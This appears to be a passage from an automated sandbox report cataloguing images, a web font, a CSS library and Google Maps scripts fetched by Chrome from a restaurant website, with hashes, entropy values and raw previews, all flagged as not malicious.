                                                                                                                                                    Entropy (8bit):7.929092982156362
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:49152:SBlOsI8HDDrSz5deyonMW2ssvI+VThPhD:wlRD3Kre99s/Fl
                                                                                                                                                    MD5:8A6E95F265ED9BC459F834D1BFE746B7
                                                                                                                                                    SHA1:2E733BA54C200E0F2F19BAC24041D3CC67124725
                                                                                                                                                    SHA-256:4AB788F154CCEAC22C96528F7EF65ACA4D27493F4373AAD3F6D1E145FE7AC4DA
                                                                                                                                                    SHA-512:D0DE0C48AA0744F72D94544B795AD320E80C8CB943214AE0806D6B722FCF5F0BE46FF6B05D968EBA3E6A9CBACDEAE96AF282536221DB72C6379F8AB09F8062EB
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/about-section.jpg
                                                                                                                                                    Preview:....#.Exif..MM.*...............p...............................................................................................................(...........1.....".....2.........*.........................i.........@.%.........,...@......Canon.Canon EOS 200D II.......'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:29 18:13:38....)...........2...........:."...........'...........0...........2..................0231...........B...........V...........j...........q...........x........................................................................................................93..........93..........93..........0100.......................t...........N.................................................................................................0...........1...........2..........4..........5.................................P...-....2023:08:19 14:40:30.2023:08:19 14:40:30.+10:00.+10:00.+10:00...`.......`..................................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 180 x 180, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):85483
                                                                                                                                                    Entropy (8bit):7.3708148136481855
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:XscDVGpgNTgbyaFTDeUuG0VjKsI6YPraCf1bHQURKdso:VDVGpgNqyaFEFT4raHZdX
                                                                                                                                                    MD5:988C6467CE61CAB183CEEEF73182492C
                                                                                                                                                    SHA1:3A31226C1B24BAB7D16B83B13B4082DB2FB60FC2
                                                                                                                                                    SHA-256:DDCBF3EE39264DB24D32901F582A9A1B1C1696C1A676C9B0BA38C585A84562D1
                                                                                                                                                    SHA-512:764D31D0197E30169E63CD302ECFDAA66F2423F2B57D2860C1CCA22E1DF1611974E7C6AE4305A7F51804860F1A155DBBE4DCF58AC2FA2336A3529B0499C93F3E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR.............=..2....pHYs...............?ciTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmpMM:DocumentID>adobe:docid:photoshop:8e4a2129-0cad-11ed-a552-baea9d3ae441</xmpMM:DocumentID>. <xmpMM:InstanceID>xmp.iid:dd39fb74-5160-db
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1536, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=2048], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):195545
                                                                                                                                                    Entropy (8bit):7.963667850553197
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:h+V8TY+V8TzM9PE0eBsXZoMwhHgQAA9ZTxAcBDydWDc7RlNBxsZFmt:Z4o9PE0uksAQAA9dxpDyMDkBaMt
                                                                                                                                                    MD5:E60BC027D4C3AF868AB7B1EBC26D60AE
                                                                                                                                                    SHA1:34A455E24E4742C7F93EDD07A219E1C86BB1FBE8
                                                                                                                                                    SHA-256:EDF90A664B4EBDF361518B58B6256956C4F46026559495902BAEB9A817284D36
                                                                                                                                                    SHA-512:4FD75CAF53078035B3B5B23A835BED2FF606D374C7E31373F9A158F00F770BDD0CA073B69CB595E5A22F933544A321957396D35DC0010245728E368AC18B79FD
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:....*.Exif..MM.*.......................................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:22 19:41:33.............0221...................................................................r...........z.(................................(........H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..&.z......X....e.8lu~..v...U...p.Hs......QmX..1...k..[..O..h..{...
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=768, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1024], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):59560
                                                                                                                                                    Entropy (8bit):7.825074021810936
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:aEOrYaSEOrYaFyGHO/s94dELbLMAJvnB4LdsjbA7plv:aEOr+EOrI/swVAbWoUplv
                                                                                                                                                    MD5:771ADDA1FCF96AB29C7E9C30FCDC00DD
                                                                                                                                                    SHA1:20BBF84F861B2A2E4F3B85F98372AF1A9F8031D4
                                                                                                                                                    SHA-256:45A002D5B6B4C0E7B38283E62E40EFB07AD19D94D96CDD1BAD1898C2115ED38B
                                                                                                                                                    SHA-512:810504A64E34A3239280193D768D309FC9DD0ECD4D0E13ECB109C40531CB6C7AD483BE72B61CA8B60DBA160BB926755DA847E68A9B5B94CC8E7D51FC09DB09E9
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:......Exif..MM.*.......................................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:12:28 00:06:19.............0221...................................................................r...........z.(.................................P.......H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....V.Ta..%.j+B.@.F.P...J..Yq....+2....G.o.....B&\!../r^.w]......M..<....
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (10639)
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):234892
                                                                                                                                                    Entropy (8bit):5.647099979859235
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:A1hPTuFlPJ038r+G7Po9fsDB+ymJlC+RaWlKvLnF6YNgHeYA+jaL5hCw/3mQ:A1hPTuFlPJ038J7Po9EDBgJlC+RaWlKX
                                                                                                                                                    MD5:920D41FA24693EBB4C31BF55E33C2DEB
                                                                                                                                                    SHA1:FE018697BA60814059E09D4F3716DBC157EB6B91
                                                                                                                                                    SHA-256:3DFB0E0A7AAF30D82FE1361D5D44798E6B59CA12D6E3453BEA2539049DA545C0
                                                                                                                                                    SHA-512:A7B5D7A0CD2AB874F75B9AC33359A4DF3019F4D39C8B66BC9AACCC035888D4C71D7446ED681930D84EE9B4631F15B586E093AC290DA9481AF3670461D7C100D5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:..window.google = window.google || {};.google.maps = google.maps || {};.(function() {. . var modules = google.maps.modules = {};. google.maps.__gjsload__ = function(name, text) {. modules[name] = text;. };. . google.maps.Load = function(apiLoad) {. delete google.maps.Load;. apiLoad([0.009999999776482582,[null,[["https://khms0.googleapis.com/kh?v=988\u0026hl=en-US\u0026","https://khms1.googleapis.com/kh?v=988\u0026hl=en-US\u0026"],null,null,null,1,"988",["https://khms0.google.com/kh?v=988\u0026hl=en-US\u0026","https://khms1.google.com/kh?v=988\u0026hl=en-US\u0026"]],null,null,null,null,[["https://cbks0.googleapis.com/cbk?","https://cbks1.googleapis.com/cbk?"]],[["https://khms0.googleapis.com/kh?v=163\u0026hl=en-US\u0026","https://khms1.googleapis.com/kh?v=163\u0026hl=en-US\u0026"],null,null,null,null,"163",["https://khms0.google.com/kh?v=163\u0026hl=en-US\u0026","https://khms1.google.com/kh?v=163\u0026hl=en-US\u0026"]],null,null,null,null,null,null,null,[["https://streetv
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 18288, version 1.0
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):18288
                                                                                                                                                    Entropy (8bit):7.9892337965823
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:tNYTsmOjEyF5gHVkLRp8REVKQUN6pAQUjAmpK9lWZuHvuwHa6eAVBTBVXVEAZyXl:MomOjPF5MVkdpkrhFpkDb6IbZH8XqWYs
                                                                                                                                                    MD5:E3DD9E36D56CBE0F316FDEC527BABA3B
                                                                                                                                                    SHA1:3A0E4F97EEE8E28085777931BF4C9611F8B6C8FB
                                                                                                                                                    SHA-256:65DDFDD2AA5DF2AD05E76831184B3EB1BA1B4791B8BE2945FBA22790A1B2E50B
                                                                                                                                                    SHA-512:EA58C481100EA65F50AA024A905A4EBAEF4E9E3F4841BE73FA08BB67C5E2F427BB8B1C82CB6EA43DFDFDECD777D8458CB47C60BA5E6F07ED7E90C370EB880676
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://fonts.gstatic.com/s/mochiypopone/v10/QdVPSTA9Jh-gg-5XZP2UmU4O9nw3BXo.woff2
                                                                                                                                                    Preview:wOF2......Gp.......<..G..........................2.......`..:.....x.....l..6.$..T. .......$..4..e..........6......M...W.......d....S.*"6....A..{.>.T....a.7....I.Zd.JU)....I..P......5,..lXT..e8....}..._..~.G.*...U..t.w..T..B......[./...+b0..E...Q#[...A...1."..<.....x.......r.]].F.....?X...h^..L...]..<.y.L.....s.{w...*..L.\c....V.Q.IL.%..?.68..<... ....q^...?".vB.0S;l.y-P..g.6U.....Y#...:YN/~...V......3.".E..S.M..i.T7#.GT.W=8..>..u+@..a9@.HC.YU}.w........qi...bJ..7...TW.....,....D:...p.2%Q..e.F..okf4^Y.}..`8.v..{..H........../@X%EC%p..K.....J.{w_j.e'.s.d.X......9.9...R>.Q.AE.....b."T.C...tgLx>... .;.No-.[..0".......}.Y....C..gE 8.L..\.v../~|....VQ...N?W`..8.....Q.o.|....U.1....R....$.|......*..%...p$s\,..S...p]<.......6.p.....{.,..o..`..^@.?l.....t4. .L.:D...B1..R....j.g;..*W.t..)s..FO.K....._.0.D}........f9......Y..JDLBJFNAIEMCKG..............+O>......+Q.L....T..P.N....4k.M.SN;.s..K...k...)O{......%/....z........q.]...=....>.O|.3...._........
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=384, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=512], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):138900
                                                                                                                                                    Entropy (8bit):7.945822764323686
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:2+QN+Qb/cPXcSDeQwyRLN7wVDHAfTMxi0jiOpqNL:2+o+c0PXcSDjB7wxHArhEpKL
                                                                                                                                                    MD5:0808BDEBCFB27D3F84A7F6C5C3D8BB21
                                                                                                                                                    SHA1:CB33E8F16DB03D2B34AA40342375EAE2969720F8
                                                                                                                                                    SHA-256:36D495902CD3ED2D09BE831657E93C5EBD481DA6AE4BB230E9C407DDFD419EFE
                                                                                                                                                    SHA-512:4E8CA77163A426AE565909BE7432A3F8BE0112D27C26EE894FEE39CFC2FB62A23A27DAA0991A5C5BFEDF937493F1C8C844A8523935AC780C78D634B863566EE6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:....)5Exif..MM.*.......................................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:22 19:34:41.............0221...................................................................r...........z.(................................'........H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..G.@.wO...o...`.....M.m.z.r..`..M..C.^jA.r..)..<%H).'...J.|6utv.......\
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):77749
                                                                                                                                                    Entropy (8bit):4.892963725655693
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:BHNuKu1Lsg9unuFl3lH/4/0uJuDqDxbe3NxdV2PVriTKIZQMcLceQ:JNuKuWg9unuLuJu9KIZQMcLceQ
                                                                                                                                                    MD5:D96B2083B0ACBB11911BB4F068158299
                                                                                                                                                    SHA1:1EBA673D48E917DC72BA41EF55C0EE08DC7D257D
                                                                                                                                                    SHA-256:8150A6E66442996F64560B128D0EFFE532ED5EABDF0A8C6176C8C4E8ED502E6F
                                                                                                                                                    SHA-512:09FEA1C151F54298495BCE8A60D92FD417531D1B325454E6AC428B1A047BF5D68951D0E89A03F8DD6587A8334E9AF35714BDFD2B73FAEACB34988C06225C527A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/vendors/animate/animate.css
                                                                                                                                                    Preview:@charset "UTF-8";../*!. * animate.css -http://daneden.me/animate. * Version - 3.7.0. * Licensed under the MIT license - http://opensource.org/licenses/MIT. *. * Copyright (c) 2018 Daniel Eden. */..@-webkit-keyframes bounce {. from,. 20%,. 53%,. 80%,. to {. -webkit-animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);. animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);. -webkit-transform: translate3d(0, 0, 0);. transform: translate3d(0, 0, 0);. }.. 40%,. 43% {. -webkit-animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06);. animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06);. -webkit-transform: translate3d(0, -30px, 0);. transform: translate3d(0, -30px, 0);. }.. 70% {. -webkit-animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06);. animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06);. -webkit-transform: translate3d(0, -15px, 0);. transform: translate3d(0, -15px, 0);.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1068, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):185613
                                                                                                                                                    Entropy (8bit):7.957422054121931
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:Zi6iCnnB/naR2BFNT2io0zEbHcbQ0o3eVkJwHioM0uZ+LbEqLK/JmzAxKN7BUcEf:9nIRA2iVEbCC3qjfM0GEdLAkUx27BUcG
                                                                                                                                                    MD5:F628A8BCDED282F991CD030CDD0B1273
                                                                                                                                                    SHA1:78C766A48522DACD5DE8F51CB14FE808973BFB41
                                                                                                                                                    SHA-256:A2DEA75A3CDF595AEE077E3FCC31F1434B5304B97F12FAA9B7C1BFE584A829DA
                                                                                                                                                    SHA-512:8B0E78F4252098253E95F0D5B25199B02EBDAADB3666DEBEE23CDD4848F578888DAE530C8246CCEAA4C02056100D00C8760D68C62EE70B3A20D9BA634864534B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallary-m-7.jpg
                                                                                                                                                    Preview:....,.Exif..MM.*...............@...........,...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 22:18:31.............0221...................................................................r...........z.(................................+o.......H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...Z....1.i$.`..:).....1..K.v.m.H...>...U...:..4x..G".*=uR....v..CuV.*..@h?
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=415, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=739], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):96307
                                                                                                                                                    Entropy (8bit):7.91511279960392
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:Q+TN3y+TN37rYLO1wgYz/Yh72LWI8kQR5/Bn25Peo6Asvef+d0VvzeAfF:Q+A+WLO1FYzAZO29jpn25mLefS0JekF
                                                                                                                                                    MD5:0A8C36EB6E77CB0CABF88EBF1B395FC1
                                                                                                                                                    SHA1:31B96AB5735C550421B60EC46905EC7E7FBE198A
                                                                                                                                                    SHA-256:C4EFDE3E6632DAFE09E8C990BEE489B795B35DF8DB89A5D745E87C29C4A3CB2E
                                                                                                                                                    SHA-512:991E24B52F1F7EF1EBB561B98B434EB5D74B375075883AAB52D72D8A5C0CB2A40531671CAE655F0AE25D3D4336F30AE29CBEA4AC2F9BB5D9AFD898ABEF087B7C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallary-3.jpg
                                                                                                                                                    Preview:....+.Exif..MM.*.......................................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 17:59:59.............0221...................................................................r...........z.(................................*........H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..~3...4V.j\.J.1+.L.P9....r.h}.q}......O...zk}].2.Ag.wY..#.....N....w...
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1600, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1200], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):124316
                                                                                                                                                    Entropy (8bit):7.9290097513255295
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:7n1J+ln1J+lLB4YtzKZ1Whf9VVhC1gXceAAPOVeQ9KdBqIZrRqDv0QJViNy:7n1Wn1QV46mZMrho2XwCZrRJ8Ek
                                                                                                                                                    MD5:BD3152310CC1D82F5900D4F35C76ED3B
                                                                                                                                                    SHA1:189F9E58B3E395AD10FF269A9D5E1BC03B594144
                                                                                                                                                    SHA-256:DF42AD1CAC18EF2B4580A719F56BED2A92D6431970ED4E43FF51628A17CF306F
                                                                                                                                                    SHA-512:F7696DC5CB0D499B4A627337933AB97AE1216BBEEF82FF15D1F995C6C752684FE04DB1848D63A0A45CF939D0E83E7B7406605BFF1B4E8C578B6BED65449D0B3E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallary-m-4.jpg
                                                                                                                                                    Preview:....%.Exif..MM.*...........................@...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 22:09:21.............0221...................................................................r...........z.(................................$].......H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...K.....- ......m......3....x....Xu....09....%..k..u.?...5f.......#.j..
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (10616)
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):11766
                                                                                                                                                    Entropy (8bit):5.938816751494987
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:2IGIsmhPhuKILOUPvROGXNX1INFa2sVCR/Ib0j3X+mavMPW+pPo8tvFDegG/RmwV:lVsmDuzL7PJOGXNX2NFa2sVCR/Ib0j3C
                                                                                                                                                    MD5:EA8A97987AF53866E9CEDB2ADA054CA2
                                                                                                                                                    SHA1:C163E87ED53B050B073D295A5536F730A48833C5
                                                                                                                                                    SHA-256:9B885AD6D555F7BE095945A9F0720E35E1562743D1C6FC511476118F9F0E6397
                                                                                                                                                    SHA-512:2C533378A1DAE6C3940BA36CA8D520B0F77641FD1096B107A27A4F54DC57178CD2DA952DDEC9C58C003F0D1528806B5A8B6D1F41E4EF027102FB92CB626452E9
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:"https://maps.googleapis.com/maps/api/js?client=google-maps-embed&paint_origin=&libraries=geometry,search&v=weekly&loading=async&language=en&region=lk&callback=onApiLoad"
                                                                                                                                                    Preview:..window.google = window.google || {};.google.maps = google.maps || {};.(function() {. var rules = {. createHTML: function(src) {. return src;. },. createScriptURL: function(src) {. return src;. }. };. var ttPolicy;. . try {. ttPolicy = window.trustedTypes.createPolicy('google-maps-api-loader', rules);. } catch(e) {. ttPolicy = rules;. }. . function getScript(src) {. var a, nonce = ((a = document.querySelector("script[nonce]")) == null ? void 0 : a.nonce) || "";. var s = document.createElement('script');. . s.src = ttPolicy.createScriptURL(src);. s.nonce = nonce;. document.head.appendChild(s);. }. . var modules = google.maps.modules = {};. google.maps.__gjsload__ = function(name, text) {. modules[name] = text;. };. . google.maps.Load = function(apiLoad) {. delete google.maps.Load;. apiLoad([0.009999999776482582,[null,[["https://khms0.googleapis.com/kh?v=988\u0026hl=en\u0026","https://khms1.googleapis.com/kh?v=988\u00
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (554)
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):184994
                                                                                                                                                    Entropy (8bit):5.631569490379207
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:YxTjNm8H2AO+yNwbuQjTgkK6Drm545DtsdayPnR5t1P2/6FzgAEY7N3D0OTFOu/b:YxTPWAO+yNwSQngkKWy545ydaqnR5tlJ
                                                                                                                                                    MD5:09E687964AECC32424F69065C6E09E01
                                                                                                                                                    SHA1:B8D3F468CA1EB45F21FC919564FAD50089B072AE
                                                                                                                                                    SHA-256:A55663C398778C3399E0BCB628DE29B8C4040611F00E8F996A7FEBF0CA0B3F84
                                                                                                                                                    SHA-512:BA389AB20D835938602484CB87B6D57A0D73271FA54DE81E57781524B6847BA06B88E0DE492CAF72E5035D6D8A1105F58D3EF85392B13DE53CC5DE1B1B6ADDD8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:google.maps.__gjsload__('util', function(_){/*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/.var Zya,aza,cza,dza,eza,fza,hza,OC,QC,RC,jza,lza,UC,nza,VC,pza,WC,rza,qza,sza,tza,uza,vza,wza,xza,yza,zza,Aza,Bza,Cza,Dza,Eza,Fza,Gza,Hza,Iza,Jza,Kza,$C,Nza,bD,Oza,Pza,Qza,Rza,Sza,Tza,Uza,Vza,Wza,Xza,Yza,$za,bAa,dAa,fAa,hAa,jAa,lAa,nAa,pAa,rAa,sAa,tAa,uAa,vAa,wAa,xAa,yAa,cD,zAa,AAa,BAa,CAa,DAa,EAa,GAa,eD,fD,HAa,IAa,JAa,KAa,LAa,MAa,NAa,OAa,PAa,QAa,RAa,gD,SAa,hD,TAa,UAa,VAa,WAa,XAa,YAa,ZAa,iD,$Aa,jD,aBa,bBa,cBa,dBa,eBa,fBa,gBa,hBa,iBa,jBa,kBa,lBa,mBa,nBa,oBa,pBa,qBa,rBa,sBa,uBa,vBa,wBa,yBa,lD,zBa,ABa,.BBa,CBa,DBa,EBa,GBa,JBa,KBa,MBa,PBa,QBa,RBa,ED,FD,GD,TBa,ID,JD,KD,LD,ND,VBa,OD,WBa,XBa,YBa,PD,QD,RD,SD,TD,ZBa,$Ba,aCa,cCa,dCa,UD,eCa,bCa,hCa,iCa,$D,mCa,qCa,rCa,sCa,cE,tCa,vCa,wCa,xCa,yCa,fE,ACa,FCa,oE,ICa,HCa,qE,JCa,sE,LCa,MCa,NCa,PCa,QCa,RE,SCa,SE,TCa,UCa,VCa,WCa,UE,YCa,XCa,ZCa,aDa,cDa,eDa,iDa,gDa,jDa,hDa,VE,WE,mDa,nDa,XE,YE,ZE,aF,bF,cF,pDa,eF,fF,qDa,gF,rDa,hF,iF,sDa,jF,kF,tDa,lF,zD
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 632 x 500, 8-bit colormap, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):65859
                                                                                                                                                    Entropy (8bit):7.983320196316593
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:CRbjlM3oYHYsSuJ5HHSVcPzkS3KQilJvBZgAi:CjW3oWYsSiVHSEl3bIsAi
                                                                                                                                                    MD5:17DD20B97F7EB742B0BD212CB8340EF0
                                                                                                                                                    SHA1:6B92213E550CFE20F0F5EF22096706EFFA2449FC
                                                                                                                                                    SHA-256:D4DD37BCAE455A0F75EB45143A676A53F66B3A69515D6ECA88648030726F0A55
                                                                                                                                                    SHA-512:17F97B7DD1241A4C81D8B908952A81868CFD2CDD1A85CDAE2C67AA2C1E6F716AE201C732281A88C76574B970F92BA87EF311C8484EC72E294DDADCF04693FF10
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR...x...........6....PLTE&7T;QbDVmPavTnzpuz.r..s.8x.)|...._w.y~..._..s6.s...7..$..P..s..|..x.....p..w..|..E..Q..W..~..u..Y..d..n .x0.;..).._..H...?..&.^..A.n..................................................................................................................................................................................................................................................!.......bKGD....D.. .IDATx...W..... .....}.xlzz.%.X.D..6!IiS.(.."...uy."0...gf.....=30.sE.v}..........g)...~Z.CDUvss.'....(.....>.[...P...T8.I..s...."......p.P......R1...j%.L&.N.8Q@(....&...H.Px......_...K...\.^!..=ow.L$..]t/w.X...ew.g........+...g*.?..]..G...F;..?..d....Cy.K....&lF.#.....RW....X...3..X..o_H-p......y..W+.~.......?.g..*..n.O.L...JnO........Q.>..;....x'.l. =._........-...CI.}]^....SB.P8(.j...<.W+T.q...U.Y.>!.k..&......O..!j?...+=y.....K.x..z.O..>!@.N...........<.we.^.....(I....F6#.........4`.W.hR>.q..q..#R..r
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 112 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):39909
                                                                                                                                                    Entropy (8bit):6.0536242496723505
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:i2dDidsU5AddAzNJQveQOZZ1EbYvw3AFsAu95GA:xz38aveL128wQPuXGA
                                                                                                                                                    MD5:83AE8CDD28F1FFABC97BDC4BBAF5DB4F
                                                                                                                                                    SHA1:13082C7158DF2641473C3209AE8BD743882A1B45
                                                                                                                                                    SHA-256:D6BC97500294B4EB4899059506B229208E21BC65B26149774CD1E7B2794E063B
                                                                                                                                                    SHA-512:951FECC40D41864A95C9D1B67BA8DB7EE245B0EF371C12AB6078FBA4FEB57B49D0CFD1356219B67C263CAE156FF23FA26D6679B3A1C9BBD76C9061E76B3F0705
